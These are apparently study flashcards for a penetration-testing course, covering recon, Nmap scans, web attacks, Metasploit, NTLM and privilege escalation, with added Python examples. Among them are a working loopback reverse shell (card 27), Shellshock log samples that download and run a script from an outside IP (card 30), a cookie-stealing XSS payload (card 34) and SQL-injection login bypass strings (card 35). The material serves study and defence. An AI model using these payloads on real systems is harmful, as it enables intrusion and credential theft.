Written Midterm Flashcards

1
Q
Describe the different roles of the red, blue, orange and purple teams in a cyber exercise
A

Red Team: (external team) attackers; emulate an adversary against the organization
Blue Team: (internal team) defenders; protect company resources and detect and respond to the red team
Orange Team: end users
Purple Team: provides in-depth analysis of the red-blue team interaction so each side learns from the other
Works with TTPs (tactics, techniques, procedures)

2
Q
Give two examples each of a vulnerability, threat, risk and asset
A

Vulnerabilities: unpatched system, open ports
Threats: e-mail phishing, zero-day attack
Risk: the probability of a threat exploiting a vulnerability (and the resulting impact); e.g. a phishing e-mail landing on an unpatched workstation, an attacker reaching a service on an exposed open port
Assets: proprietary software, company data

3
Q
What are the CVE database and the NVD database?
A

CVE (Common Vulnerabilities and Exposures) – a list of entries, each with an ID (CVE-YYYY-NNNN), a description and public references
NVD (National Vulnerability Database) – US government (NIST) database built on the CVE list; adds severity scores (CVSS), security checklists, software flaws, misconfigurations and affected-product data

4
Q
Describe the stages of the author's pentesting process and apply them to a scenario
A

Intelligence gathering – look at company websites, e-mail addresses, phone numbers
Initial foothold – gain access to the network
Local/network enumeration – build a list of devices on the network
Local privilege escalation – use a tool like Meterpreter to look for vulnerable, exploitable service paths
Persistence – create reverse listeners / a backup admin account
Internal (lateral) movement – compromise other devices on the network
Domain privilege escalation – obtain domain admin rights and the AD password hashes
Dumping and cracking hashes – e.g. crack the dumped hashes with John the Ripper
Data identification/exfiltration
Reporting

5
Q
Describe how you would build your pentesting test box
A
Isolated PC running a replica network (e.g. virtual machines on an isolated virtual network, so nothing reaches production)
-	OS to attack
o	Win10
o	Windows Server
-	Tools
o	Kali
o	Wireshark
o	Nessus
o	Burp
o	recon-ng
o	sqlmap
o	Mimikatz
o	etc.
6
Q
Describe activities you can perform in a passive pentesting scan
A

Activities that don't touch the target (no packets are sent to its systems; only public sources are queried)
Profile the organization -> whois
Profile the network -> recon-ng

7
Q
What website can be used to view old versions of webpages?
A

Wayback Machine -> archive.org

8
Q
Describe activities you can perform in an active pentesting scan
A

Activities that interact with the target directly:
Social engineering
Banner grabs
Nmap scans
Nessus scans

9
Q
Describe common ICMP types and error codes (ICMP types 0, 3, 8)
A

ICMP type 0 = echo reply (ping response)
ICMP type 3 = destination unreachable; the separate code field says why:
  code 0 = network unreachable
  code 3 = port unreachable
  code 8 = source host isolated
ICMP type 8 = echo request (ping)
Don't confuse the type field with the code field: 0, 3 and 8 above are codes only within type 3.

10
Q
In reference to the above question, what can a hacker use ICMP error codes for?
A

Mapping the network: an echo reply shows a host is up; a "port unreachable" answer to a UDP probe shows the host is up but that port is closed; "network/host unreachable" from a router shows which ranges are not routed; silence where an error would be expected suggests a firewall dropping the probe
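Added example (not from the course notes): a small Python decoder for the ICMP header that builds an echo request with a valid checksum, decodes constructed replies and states what a network-mapping scan learns from each. The packets are constructed inline and nothing is sent on the wire; the unreachable message's quoted bytes are a placeholder for the offending IP header a real router would echo back.

```python
import struct

# ICMP types and type-3 codes from RFC 792 that the card above covers.
ICMP_TYPES = {0: "echo reply", 3: "destination unreachable", 8: "echo request"}
UNREACHABLE_CODES = {
    0: "network unreachable",
    1: "host unreachable",
    3: "port unreachable",
    8: "source host isolated",
    13: "communication administratively prohibited",
}


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes = b"probe") -> bytes:
    """Echo request (type 8) or reply (type 0) with the checksum filled in."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def build_unreachable(code: int, quoted: bytes = b"\x45" + b"\x00" * 27) -> bytes:
    """Constructed destination-unreachable (type 3) message; `quoted` stands in for
    the IP header + 8 bytes of the offending datagram that a real sender echoes."""
    header = struct.pack("!BBHI", 3, code, 0, 0)
    csum = icmp_checksum(header + quoted)
    return struct.pack("!BBHI", 3, code, csum, 0) + quoted


def parse_icmp(msg: bytes) -> dict:
    """Decode type and code, describe them, and verify the checksum
    (summing a message that already carries its checksum yields 0)."""
    if len(msg) < 8:
        raise ValueError("ICMP header is 8 bytes")
    icmp_type, code = struct.unpack("!BB", msg[:2])
    desc = ICMP_TYPES.get(icmp_type, "type %d" % icmp_type)
    if icmp_type == 3:
        desc += ": " + UNREACHABLE_CODES.get(code, "code %d" % code)
    return {"type": icmp_type, "code": code, "desc": desc,
            "checksum_ok": icmp_checksum(msg) == 0}


def interpret(msg: bytes) -> str:
    """What a network-mapping scan concludes from one reply."""
    p = parse_icmp(msg)
    if not p["checksum_ok"]:
        return "corrupt reply, ignore"
    if p["type"] == 0:
        return "host is up (replied to ping)"
    if p["type"] == 3 and p["code"] == 3:
        return "host is up; probed UDP port is closed"
    if p["type"] == 3 and p["code"] in (0, 1):
        return "no route: a router reports the network/host unreachable"
    if p["type"] == 3 and p["code"] == 13:
        return "filtered: a firewall or ACL rejected the probe"
    return p["desc"]
```

The same checksum routine verifies a received message: because the sender stored the one's complement of the sum, summing the whole message including the checksum field folds to 0xFFFF and complements to zero.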

11
Q
What information can you gather from DNS recon?
A

SOA (primary name server, admin contact, zone serial)
MX (mail servers)
NS (authoritative name servers), SRV (service locations, e.g. LDAP/Kerberos in an AD domain)
Host records (A, AAAA)

12
Q
What is a banner grab?
A

Connecting to a port and reading the service's greeting to get high-level information (product, version) about the service offered on that port

13
Q
Know the different types of scans Nmap can do and how it does each scan (null, SYN, Xmas, TCP connect, version); indicate the TCP flags used
A
-	Null
o	-sN
o	TCP packets with no flags set (all flag bits 0); an open port stays silent, a closed port answers RST
-	SYN
o	-sS
o	Sends a SYN to each port; a SYN/ACK reply means open, RST means closed; Nmap answers the SYN/ACK with RST instead of ACK, so the handshake is never completed (half-open scan)
-	Xmas
o	-sX
o	FIN, PSH and URG flags set ("lit up like a Christmas tree"); same open/closed responses as the null scan
-	TCP connect
o	-sT
o	Completes the full three-way handshake (SYN, SYN/ACK, ACK) through the OS socket API
-	Version
o	-sV
o	Connects to each open port and matches the service's responses against Nmap's probe database to identify the service and its version
14
Q
Know what is returned when a scan hits an open or closed port or a firewall
A

SYN / connect scan: open port -> SYN/ACK; closed port -> RST; firewall -> nothing comes back (or an ICMP unreachable), so Nmap reports "filtered"

Null / FIN / Xmas scan: open port -> no response; closed port -> RST; firewall -> no response (open and filtered cannot be told apart, reported as "open|filtered")
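Added example (not from the course notes) covering the two cards above: Python that builds the flag byte each Nmap scan type sends, decodes the flags in a constructed reply header, and maps reply-or-silence to the port state Nmap would report. Headers are constructed in memory with a zero checksum; nothing is transmitted.

```python
import struct
from typing import Optional

# TCP flag bits (RFC 793), low byte of the offset/flags word.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = (("FIN", FIN), ("SYN", SYN), ("RST", RST), ("PSH", PSH), ("ACK", ACK), ("URG", URG))

# Flags each Nmap scan type sets in its probe (-sN, -sS, -sX, -sT).
PROBE_FLAGS = {"null": 0, "syn": SYN, "xmas": FIN | PSH | URG, "connect": SYN}


def flag_names(flags: int) -> str:
    return "/".join(name for name, bit in FLAG_NAMES if flags & bit) or "none"


def build_tcp_header(sport: int, dport: int, flags: int, seq: int = 0, ack: int = 0) -> bytes:
    """Minimal 20-byte TCP header (constructed for parsing only; checksum left 0)."""
    offset_flags = (5 << 12) | flags          # data offset = 5 words, no options
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, offset_flags, 8192, 0, 0)


def tcp_flags(header: bytes) -> int:
    """Low six bits of the offset/flags word (ECN bits ignored)."""
    return struct.unpack("!H", header[12:14])[0] & 0x3F


def classify(scan: str, reply: Optional[bytes]) -> str:
    """Port state Nmap infers from the reply (or silence) to one probe."""
    if reply is None:
        # SYN/connect: a SYN always draws SYN/ACK or RST, so silence means a
        # firewall dropped it. Null/Xmas: RFC 793 hosts ignore flag-less or
        # odd-flag segments on OPEN ports, so silence is "open or filtered".
        # (Windows answers RST regardless of state, so null/Xmas show every
        # port closed there.)
        return "filtered" if scan in ("syn", "connect") else "open|filtered"
    f = tcp_flags(reply)
    if f & RST:
        return "closed"               # RST from a closed port (any scan type)
    if scan in ("syn", "connect") and (f & (SYN | ACK)) == (SYN | ACK):
        return "open"                 # SYN/ACK: second step of the handshake
    return "unexpected flags " + flag_names(f)


def next_probe(scan: str, reply: bytes) -> Optional[int]:
    """What Nmap sends after a SYN/ACK: -sS tears down with RST (half-open),
    -sT completes the handshake with ACK."""
    if classify(scan, reply) != "open":
        return None
    return RST if scan == "syn" else ACK
```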

15
Q
What type of scan will always find a live host?
A

ARP scan (on the local subnet): every host must answer ARP to communicate at all, and a host firewall cannot block it

16
Q
Know how to create a Python banner grabber
A
import socket

host, port = "192.0.2.10", 22          # target host and port (example values)
s = socket.socket()                     # TCP socket (AF_INET, SOCK_STREAM by default)
s.settimeout(5)
s.connect((host, port))
print(s.recv(1024))                     # read the service's banner
s.close()
17
Q
Know the difference between and usage of a credentialed and a non-credentialed scan
A

Credentialed – authenticated scan of the host (the scanner logs in with a username/password); sees problems that cannot be seen without authentication, e.g. missing patches, local misconfigurations, installed software

Non-credentialed – quick view of vulnerabilities by looking only at the services the host exposes on the network (the outside attacker's view)

18
Q
Describe four methods for making the initial foothold into an organization
A
E-mail spear phishing -> user clicks on a link; or DNS redirection (user visits a malicious website)
Web server with default credentials (default password)
Breached/leaked credentials
Input flaws (e.g. injection through input fields or a login form)
19
Q
Describe the web environment and common attacks against the servers (DNS, DoS, buffer overflow)
A

DNS – insert or poison records so that users resolve the target name to your malicious website instead of the real one
DoS – overloading a port with SYN packets (SYN flood) so the server's connection table fills and legitimate clients cannot connect
Buffer overflow – write more data than the memory buffer holds, overwriting adjacent memory (e.g. the return address) so the server executes the attacker's embedded code

20
Q
Describe input/form tampering
A

Attacker modifies values the server wrongly trusts: hidden fields, pre-selected parameters (drop-downs, radio buttons), attribute parameters (e.g. maxlength, disabled), or the request parameters themselves in an intercepting proxy

21
Q
Describe attacks against the web client environment
A

SQL injection – inputting SQL statements through the client's input fields to gain access to the backend database

22
Q
What can the Burp proxy do?
A

Act as a man-in-the-middle between the browser and the web server

Captures traffic, with the ability to inspect and manipulate requests and responses before forwarding them

23
Q
What does Burp proxy have to do with HTTPS websites?
A

(the original answer is an image) To intercept HTTPS, Burp terminates TLS itself: it presents the browser a certificate for the site issued by Burp's own CA, so the browser must be configured to trust the Burp CA certificate (otherwise it shows a certificate warning); Burp then opens its own TLS connection to the real server

24
Q
What does the OWASP web application scanner (OWASP ZAP) do?
A

Spiders the website and its file structure and scans it for vulnerabilities such as XSS and injection, acting as an intercepting proxy like Burp

25
Q
Describe the functionality of Metasploit
A

Metasploit is an automated, open-source exploitation framework. It contains modules for scanning (auxiliary), exploit development, exploitation and post-exploitation, plus payloads such as Meterpreter.

26
Q
Describe the functionality of Meterpreter
A

Meterpreter is Metasploit's consistent, cross-platform post-exploitation payload with a command-line interface. It runs in memory on the target (staged: a small stager loads it without writing it to disk) and can load extensions for persistent backdoors, remote packet sniffing, keylogging, system information and hash dumps, pivoting, among others.

27
Q
What is a reverse shell?
A

A reverse shell is a shell run on the target system that connects back out to a listener on the attacker's machine (the target initiates the connection, which usually passes through firewalls that block inbound connections)
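Added example (not from the course notes): both ends of a reverse shell in Python, run against each other over loopback so it can be exercised on one machine. The "attacker" listener binds an ephemeral port on 127.0.0.1, the "target" connects back and executes whatever line it receives; the command sent is a harmless echo. Host, port and command are the demo's own choices.

```python
import socket
import subprocess
import threading


def reverse_shell(host: str, port: int) -> None:
    """Target side: connect OUT to the attacker's listener, then execute every
    line received as a shell command and send the output back."""
    s = socket.create_connection((host, port), timeout=10)
    with s, s.makefile("rb") as commands:
        for line in commands:                      # EOF when the attacker hangs up
            cmd = line.decode().strip()
            if not cmd:
                continue
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            s.sendall(proc.stdout + proc.stderr)


def run_listener(cmd: str, ready: threading.Event, port_box: list, out_box: list) -> None:
    """Attacker side: bind, wait for the connect-back, send one command, collect output."""
    srv = socket.socket()
    srv.settimeout(10)
    srv.bind(("127.0.0.1", 0))                     # loopback, ephemeral port
    srv.listen(1)
    port_box.append(srv.getsockname()[1])
    ready.set()                                    # tell the "target" where to call back
    conn, _ = srv.accept()
    with srv, conn:
        conn.sendall(cmd.encode() + b"\n")
        conn.shutdown(socket.SHUT_WR)              # no more commands: shell sees EOF
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    out_box.append(b"".join(chunks).decode())


def demo(cmd: str = "echo reverse shell ok") -> str:
    """Run both ends on this machine and return what the listener received."""
    ready, port_box, out_box = threading.Event(), [], []
    t = threading.Thread(target=run_listener, args=(cmd, ready, port_box, out_box))
    t.start()
    ready.wait(10)
    reverse_shell("127.0.0.1", port_box[0])
    t.join(10)
    return out_box[0] if out_box else ""


if __name__ == "__main__":
    print(demo())
```

In a real engagement the listener runs on the attacker's host (for example Metasploit's multi/handler) and the target half is what a payload delivers; the direction of the TCP connection is the whole point, since an outbound connection from the victim is rarely blocked.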

28
Q
What is beaconing?
A

Beaconing is when an infected computer periodically reaches out to the attacker's server to signal successful installation and to wait for further instructions (command and control).

29
Q
Describe the Heartbleed vulnerability
A

Heartbleed (CVE-2014-0160) was an OpenSSL vulnerability in the TLS heartbeat extension: the server copied as many bytes as the heartbeat request claimed, without checking the real payload length, so a small request with a large declared length returned up to 64 KB of the process's memory (private keys, session cookies, passwords) per request.
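Added example (not from the course notes or OpenSSL): a Python model of the heartbeat handler before and after the fix. The "memory beyond the request" is a constructed byte string standing in for whatever the server process happened to have next to the buffer; the length check in the fixed version is the one OpenSSL 1.0.1g added.

```python
import struct

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
MIN_PADDING = 16

# Constructed stand-in for the bytes lying beyond the request buffer in the
# server process: the kind of data Heartbleed leaked.
NEIGHBOURING_MEMORY = (b"\x00" * 8 + b"Cookie: session=ABC123; "
                       b"user=alice&pass=hunter2 " + b"\x00" * 64)


def heartbeat_request(payload: bytes, claimed_length: int) -> bytes:
    """TLS heartbeat body: type(1) | payload_length(2) | payload | padding(>=16).
    An attacker sets claimed_length far larger than len(payload)."""
    return struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length) + payload + b"\x00" * MIN_PADDING


def vulnerable_respond(record: bytes, memory_after: bytes) -> bytes:
    """OpenSSL before 1.0.1g: trust the declared length and memcpy that many
    bytes starting at the payload, running past the record into whatever follows."""
    hb_type, plen = struct.unpack("!BH", record[:3])
    heap = record[3:] + memory_after        # payload sits in front of other data
    return struct.pack("!BH", HEARTBEAT_RESPONSE, plen) + heap[:plen]


def fixed_respond(record: bytes, memory_after: bytes):
    """The fix: discard the record if 1 + 2 + payload_length + 16 exceeds the
    record's actual length, so the copy can never leave the request."""
    hb_type, plen = struct.unpack("!BH", record[:3])
    if 1 + 2 + plen + MIN_PADDING > len(record):
        return None                          # silently dropped, no response
    payload = record[3:3 + plen]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, plen) + payload


def leaked_bytes(response: bytes, honest_payload: bytes) -> bytes:
    """Everything in the response beyond what the client legitimately sent."""
    return response[3 + len(honest_payload):]
```

The real bound was 64 KB per heartbeat only because payload_length is a 16-bit field; nothing stopped an attacker from sending the request repeatedly to sweep through memory.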

30
Q
Describe the Shellshock vulnerability
A

Shellshock (CVE-2014-6271) was a Bash vulnerability: when Bash imported a function definition from an environment variable, it also executed any commands appended after the definition. Any service that placed attacker-controlled input into environment variables (the classic case is CGI web scripts, which put request headers there) would run the attacker's code without authentication, e.g. a payload that beacons back to the attacker.
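Added example (not from the course notes): detection logic in Python that scans web server log lines for the Shellshock function-definition pattern in any quoted field and extracts the command that would have run. The three log lines are constructed for the example; the IPs are documentation addresses.

```python
import re

# Bash function-definition prefix followed by a trailing command, the
# Shellshock signature: () { :;}; <command>
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
QUOTED_FIELD_RE = re.compile(r'"([^"]*)"')

# Constructed Apache combined-format log lines: two probes and one normal request.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.5/b.sh -O /tmp/b; sh /tmp/b'"
198.51.100.7 - - [24/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [24/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; echo; /usr/bin/id" "curl/7.38.0"
"""


def find_shellshock(log_text: str):
    """Return (line number, source IP, offending header value) for each line in
    which any quoted field (request, referer, user-agent) carries the pattern."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        src = line.split(" ", 1)[0]
        for field in QUOTED_FIELD_RE.findall(line):
            if SHELLSHOCK_RE.search(field):
                hits.append((lineno, src, field))
                break
    return hits


def trailing_command(field: str) -> str:
    """The command Bash would have executed after importing the definition."""
    m = SHELLSHOCK_RE.search(field)
    return field[m.end():].strip() if m else ""
```

Because CGI copies every request header into the environment, the User-Agent and Referer fields are where probes show up most; a hit with status 200 on a /cgi-bin/ path is worth treating as a possible compromise rather than a blocked attempt.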

31
Q
Describe the functionality of msfvenom
A

msfvenom is Metasploit's payload generator: it builds standalone payloads (e.g. a Meterpreter reverse shell that beacons back to the attacker) in many formats (exe, dll, elf, raw shellcode) and can encode them in an attempt to evade antivirus software.

32
Q
What is a clear indication that a website is susceptible to an SQL injection attack?
A

The input fields pass special characters (notably the single quote ') straight to the database: a quote that produces a database error message or changes the query result, instead of being rejected or escaped, shows the input ends up inside the SQL statement.

33
Q
Describe how an XSS attack takes place
A

An XSS attack occurs when an attacker injects malicious script into a trusted website (via a stored comment, a reflected URL parameter, etc.) and the site serves that script to other users' browsers, where it runs with the site's origin and can read cookies or act as the user.

34
Q
What makes a website vulnerable to an XSS attack?
A

Lack of input validation and output encoding in the web application: user-supplied data is written into the page unescaped, which lets an attacker write script code that runs in other users' browsers
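Added example (not from the course notes) for the two XSS cards above: the vulnerable rendering beside the hardened one in Python. The template and the cookie-stealing payload are constructed for the example; the fix is output encoding with the standard library's html.escape.

```python
import html

# Constructed page template: the comment body is dropped inside the <p>.
TEMPLATE = "<html><body><h1>Comments</h1><p>{body}</p></body></html>"

# Constructed stored-XSS payload: ships the cookie of whoever views the page.
PAYLOAD = "<script>new Image().src='http://203.0.113.5/c?'+document.cookie</script>"


def render_vulnerable(comment: str) -> str:
    """User input pasted straight into the HTML: the browser parses it as markup."""
    return TEMPLATE.format(body=comment)


def render_safe(comment: str) -> str:
    """Output encoding: < > & and quotes become entities, so the input stays text."""
    return TEMPLATE.format(body=html.escape(comment, quote=True))


def executes_script(page: str) -> bool:
    """Crude check a tester makes on the response: is there a live <script> tag?"""
    return "<script" in page.lower()
```

Escaping belongs at the point of output, chosen for the context (HTML body here; attributes, JavaScript and URLs each need their own encoding), which is why input validation alone does not close the hole.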

35
Q
Describe an SQL injection (SQLi) attack
A

SQL injection attacks a data-driven application by supplying input that the application concatenates into the SQL statements it sends to its backend SQL database, so the attacker's input is executed as part of the query (e.g. to bypass a login or read other tables).
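Added example (not from the course notes) serving this card and the "clear indication" card above: a login query built by string concatenation beside its parameterised form, run against an in-memory SQLite database with two constructed accounts, plus the single-quote probe a tester uses to spot the flaw.

```python
import sqlite3

# Constructed sample accounts for an in-memory SQLite database.
USERS = [("alice", "s3cret", 1), ("bob", "hunter2", 0)]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return db


def login_vulnerable(db, username: str, password: str):
    """String concatenation: the user's text becomes part of the SQL grammar."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str):
    """Parameterised query: values are bound by the driver and never parsed as SQL."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def quote_probe(db, value: str) -> str:
    """The tell-tale test from the card above: does a stray single quote reach
    the database and break the statement?"""
    try:
        login_vulnerable(db, value, "x")
        return "no error"
    except sqlite3.Error as exc:
        return "database error: %s" % exc
```

`alice' --` comments out the password check; `x' OR '1'='1` makes the WHERE clause true for every row. Neither works against the parameterised query, because the driver sends the text as a value rather than as SQL.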

36
Q
Describe the functionality of BeEF
A

BeEF (Browser Exploitation Framework) works in tandem with an XSS attack: the attacker delivers, using Burp or another open-source/commercial proxy to craft the request, a payload that redirects the victim's browser to BeEF's hook script or a malicious BeEF page. Once the browser is hooked, BeEF lets the attacker gather information about it and run further modules for as long as the victim stays under their control.

37
Q
What is the use of error messages for the pentester?
A

Error messages give the pentester information for refining an SQL statement (which database engine, which part of the syntax failed) or additional details about the target system (file paths, software versions).

38
Q
What authentication method does a Windows computer use when accessing a computer by name or FQDN when it is part of a domain?
A

Kerberos: the name is used to build a service principal name (SPN) and the client obtains a service ticket from the domain controller; the transport is SMB, but the authentication protocol is Kerberos, with NTLM only as a fallback

39
Q
What authentication method does a Windows computer use when accessing a computer by IP address? (What does the computer send first for authentication?)
A

NTLM. An IP address has no SPN, so Kerberos cannot be used and the client falls back to NTLM (carried inside the SMB session setup): the first thing the client sends is the NTLM NEGOTIATE message, after which the server sends its CHALLENGE

40
Q
Describe the NTLM process
A

- User (client) sends a connection request to the server (NEGOTIATE)
- Server generates a random 8-byte (64-bit) one-time number, the challenge/nonce, and sends it to the client
- Client encrypts the challenge with the hash of the user's password (the NT hash; the password itself is never sent) and returns the response
- For a domain account the server cannot validate the response itself: it sends the username, the challenge and the client's response to the DC (over Netlogon)
- DC uses the username to retrieve the user's hashed password from its account database (Active Directory; the SAM database for local accounts)
- DC computes the expected response from the stored hash and compares it to the response from the client
- If they are identical, authentication is successful
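Added example (not from the course notes): both sides of the NTLMv2 challenge/response in Python, with the server/DC role recomputing the proof from the stored hash. The NT hash is MD4 of the UTF-16LE password, but MD4 is disabled in many hashlib builds, so the well-known NT hash of the password "password" is embedded as a constant; the blob omits the target-info AV pairs a real client includes.

```python
import hashlib
import hmac
import os
import struct
import time

# NT hash = MD4(UTF-16LE(password)). MD4 is disabled in many hashlib builds
# (OpenSSL 3), so the well-known NT hash of the password "password" is embedded.
NT_HASH_OF_PASSWORD = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 over UPPER(user)+domain (UTF-16LE), keyed by the NT hash."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def filetime_now() -> int:
    """Windows FILETIME: 100 ns ticks since 1601-01-01."""
    return (int(time.time()) + 11644473600) * 10_000_000


def client_response(nt_hash, user, domain, server_challenge, client_nonce, timestamp):
    """Client side: prove knowledge of the hash without ever sending the password.
    NtChallengeResponse = NTProofStr || blob, NTProofStr = HMAC-MD5(key, challenge||blob)."""
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_nonce + b"\x00" * 4)           # target-info AV pairs omitted (assumption)
    proof = hmac.new(ntowf_v2(nt_hash, user, domain),
                     server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def server_verify(stored_nt_hash, user, domain, server_challenge, response) -> bool:
    """Server / domain controller side: recompute the proof from the stored
    hash of the named user and compare it with what the client sent."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt_hash, user, domain),
                        server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def authenticate(user, domain, stored_nt_hash, client_nt_hash) -> bool:
    """One full exchange: challenge -> response -> verification."""
    server_challenge = os.urandom(8)             # the 8-byte one-time nonce
    response = client_response(client_nt_hash, user, domain, server_challenge,
                               os.urandom(8), filetime_now())
    return server_verify(stored_nt_hash, user, domain, server_challenge, response)
```

Two properties follow directly from the code: a captured response is useless against a fresh challenge (replay fails), and whoever holds the NT hash can authenticate without the password, which is why dumped hashes (pass-the-hash) are as good as passwords to an attacker.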

41
Q
Describe the entire process your computer goes through in order to send a packet on the network when you enter www.google.com into a browser
A

Name resolution: the DNS client tries to resolve the FQDN to an IP address
- Looks locally first: DNS cache and hosts file
- If not found, queries its configured DNS servers (which recurse through the root, .com and google.com name servers) to resolve the domain name to an IP address
o If that fails, it falls back to LLMNR and NetBIOS broadcasts
- ARP resolves the next hop (the default gateway, since the address is off-subnet) to a MAC address
- 3-way TCP handshake with the web server (port 80/443), followed by a TLS handshake for HTTPS
- The HTTP request is sent and the web page is displayed

42
Q
In reference to the question above, how can the process be compromised?
A
  • A man-in-the-middle attack (e.g. ARP spoofing) or sniffing of the traffic between the two computers; spoofing or poisoning the DNS answer
  • By answering the victim's LLMNR or NetBIOS broadcasts with spoofed response packets (LLMNR/NBT-NS poisoning)
43
Q
Describe the entire process your computer goes through in order to send a packet on the network when you enter \\class-server into your computer
A

Resolve the computer name to an IP address (DNS first, then LLMNR and NetBIOS broadcasts if DNS has no answer); then resolve that IP address to a MAC address with ARP; then open an SMB session (TCP 445) and authenticate (Kerberos for a domain name, NTLM as fallback)

44
Q
Describe the functionality of LSASS
A

LSASS (Local Security Authority Subsystem Service) enforces the local security policy and handles user logons. It keeps the credentials of currently (and recently) logged-on users in memory (password hashes, Kerberos tickets) so they can be reused for authentication without prompting again; that is why tools like Mimikatz read LSASS memory.

45
Q
Describe 3 methods of escalating privileges
A

Misconfigured privileges (e.g. SeImpersonate or SeBackup rights granted to ordinary users)
Services with unquoted paths (Windows tries each space-delimited prefix of the path, so a file planted earlier on the path runs as the service)
Service binaries or service configuration writable by everyone
Misconfigured group policies
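Added example (not from the course notes): Python that reproduces the search order Windows follows for an unquoted service path and flags the services where an attacker could plant a binary earlier on that path. The service entries are constructed; whether the candidate directories are actually writable still has to be checked on the host.

```python
import re

# Constructed service entries (name, ImagePath) as one would pull from the
# registry or `wmic service get name,pathname`.
SERVICES = [
    ("GoodSvc", r'"C:\Program Files\Good Vendor\good.exe" -service'),
    ("BadSvc", r"C:\Program Files\Some Vendor\Agent Tools\agent.exe -run"),
    ("NoSpaces", r"C:\Windows\system32\svchost.exe -k netsvcs"),
]


def search_order(image_path: str):
    """The file names CreateProcess tries, in order, for a service ImagePath.
    Unquoted paths with spaces are ambiguous, so each space-delimited prefix is
    tried with .exe appended before the intended binary is reached."""
    p = image_path.strip()
    if p.startswith('"'):
        return [p[1:p.index('"', 1)]]              # quoted: one unambiguous path
    m = re.search(r"\.exe", p, re.IGNORECASE)
    exe = p[:m.end()] if m else p.split(" ")[0]    # drop arguments after the binary
    parts = exe.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return candidates


def unquoted_path_findings(services):
    """Services where an attacker could plant a binary that runs before the
    real one (with the service's privileges). Whether those directories are
    writable still has to be checked on the host (e.g. icacls)."""
    findings = []
    for name, path in services:
        order = search_order(path)
        if len(order) > 1:
            findings.append((name, order[:-1]))
    return findings
```

The usual outcome is that C:\ and C:\Program Files are not writable by a standard user, but a vendor directory further down often is; the exploit is then to drop the planted .exe there and restart the service (or reboot).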

46
Q
Describe the process of running PsExec and Windows PowerShell remotely
A

PowerShell remoting – the target must have WinRM enabled (Enable-PSRemoting); the client opens a session to the target's name or IP address (Enter-PSSession / Invoke-Command, TCP 5985/5986) and manages the system remotely; once WinRM is listening, remote PowerShell is permitted for administrators
PsExec – runs remote commands on a Windows system over SMB: it needs ports 445 (and 135) open and admin credentials, copies its service binary to the ADMIN$ share and starts it as a service; it can also be run from PowerShell

47
Q
What are LLMNR, NetBIOS and ARP used for?
A

LLMNR: protocol based on the DNS packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link (by multicast), used when DNS cannot answer
NetBIOS (NBT-NS): name service that allows applications on different computers to find each other and communicate over a LAN, by broadcast
ARP: network-layer protocol used to convert an IP address into a physical (MAC) address

48
Q
How can the above be exploited?
A

With a tool such as Responder, which listens for LLMNR and NBT-NS queries and answers them with its own IP (poisoning the name resolution), so the victim connects to the attacker and hands over its NTLM challenge/response, which can then be cracked offline or relayed

49
Q
What surprised us about Server 2016 in reference to PowerShell?
A

It already had PowerShell remoting (WinRM) enabled by default, allowing remote access to the server without anyone having explicitly turned it on